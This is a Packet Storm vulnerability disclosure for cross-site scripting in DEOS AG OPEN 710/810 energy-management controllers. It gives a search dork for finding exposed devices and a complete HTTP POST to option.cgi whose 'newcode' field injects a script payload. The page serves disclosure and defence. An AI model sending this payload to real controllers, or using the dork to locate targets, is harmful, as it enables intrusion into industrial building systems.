DEOS AG OPEN 710/810 Cross Site Scripting ≈ Packet Storm

DEOS AG OPEN 710/810 Cross Site Scripting ≈ Packet Storm

Home[1] Files[2] News[3] Contact[4] Add New[5]

DEOS AG OPEN 710/810 Cross Site Scripting[6]
Authored by n4pst3r[7]

DEOS AG OPEN 710 and 810 control systems suffer from a cross site scripting vulnerability.

MD5 | b1e4e5ef43de46b40557c5685bdd9bd6

Change Mirror[11] Download[12]

        # Title: DEOS control systems GmbH - OPEN 710/810 EMS > Cross Site Scripting Vulnerability
# Dork: app:"DEOS AG OPEN EMS System ics device httpd"
# Vendor page: https://www.deos-ag.com/en/
# Exploit Author: n4pst3r
# Tested on: Debian
POST /cgi-bin/option.cgi?function=2 HTTP/1.1
Content-Length: 83
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/cgi-bin/cosmobdf.cgi?function=%271&session=0&grafik=0
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip;deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML; like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
devcode_form=&lastcode_form=&newcode=94102_</script><script>prompt(1337)</script>

Login[13] or Register[14] to add favorites

File Archive:

March 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services[118]
Hosting By
Rokasec[119]
close
Image

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"